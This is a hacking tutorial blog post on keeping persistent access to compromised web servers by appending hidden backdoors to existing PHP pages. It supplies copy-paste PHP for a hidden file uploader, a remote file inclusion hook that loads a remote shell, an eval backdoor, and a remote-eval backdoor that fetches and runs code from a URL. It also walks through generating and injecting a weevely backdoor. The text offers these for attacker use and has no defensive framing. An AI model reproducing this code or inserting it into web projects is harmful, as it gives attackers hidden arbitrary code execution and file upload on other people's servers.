Infect Web Files With Malicious BackDoors

Infect web files with malicious php backdoor back connect net cat php uploader bypass backdoor infection how to infect web files with weevely

backdoors
Keeping access of the web-server even after its patch is good practice and many times your php shell or backdoor could be deleted because of a patch or any other reason.
Today you will learn that  HOW YOU CAN INFECT WEB PAGES OR FILES WITH MALICIOUS BACKDOORS  to keep you access on the server for a long time.
To make it easy for you because i know everyone is not a coder so i am sharing excat codes which i use to infect php files.
You know about the uploader ? what if you create a hidden uploader ? yes a hidden uploader which comes up after you command the file with your unique address and no one knows that its an uploader inside the file which can be used by simply commanding it.
Get Started 
Here below is a hidden uploader php code just copy that code and put that code at the end of the php file where php is ending and after putting that code in a php file at the end save it and open that php file now to use the unloader you will have to command it simply  " ?upload=ok " this is the command put this after the php file and unloader will appear at the end.


Hidden Uploader :

 <?php if($_GET['upload'] != ""){ if(!isset($_POST['upload'])){ echo '<form enctype="multipart/form-data" method="POST" action=""><br><b>File:</b><input type="file" name="file"> <input type="submit" value="Upload" name="upload"></form>'; } else{ $temporaney = $_FILES['file']['tmp_name']; $upload = $_FILES['file']['name']; if(move_uploaded_file($temporaney,$upload)) echo '<font color="green">File uppato!</font>'; else echo '<font color="red">File non uppato!</font>'; }}?>  

This is a hidden uploader malicious code ! Why i say it hidden is that it dont show the uploader till we dont command it .....like if you want to infect any web page example index.php the main page with that uploader then open that file and paste that code at the end of the file source code

example
www.timesofhacking.com/index.php
 then you will write www.timesofhacking.com/index.php?upload=ok



Weevely Infection :

Now Infect a web page with a weevely backdoor just generate a php backdoor by typing the command
  • weevely generate password
where password is your password and a backdoor with your password will be generated in the current directory of weevely and if you dont know about weevely please google it now open that weevely.php file with notepad and copy its source code and paste that source code at the end of the web page source where the web page php is ending and save it now web page is infected with php file so connect it with weevely terminal.

The Same Process with other malicious php codes which are below



RFI Code :


  " <?php if($_GET['rfi'] != "") include($_GET['rfi']); ?>   "


then after that open the file

and write " www.timesofhacing.com/index.php?rfi=http://www.your_remote_shell_link.com/shell.php "




Eval Code : 

"  <?php if($_GET['eval'] != "") eval($_GET['eval']); ?>  "

 The Same thing copy paste the malicious code and paste it at the end of the file which you want to infect and after that open file and command it as "  www.timesofhacing.com/index.php?eval=your_eval_code_here " after the file



Remote Eval Code : 

" <?php if($_GET['remoteeval'] != "") eval(file_get_contents($_GET['remoteeval'])); ?>  "

This is for remote eval so after writing this code at the end of the file

write "www.timesofhacking.com/index.php?remoteeval=[LINK CODE] "


Comments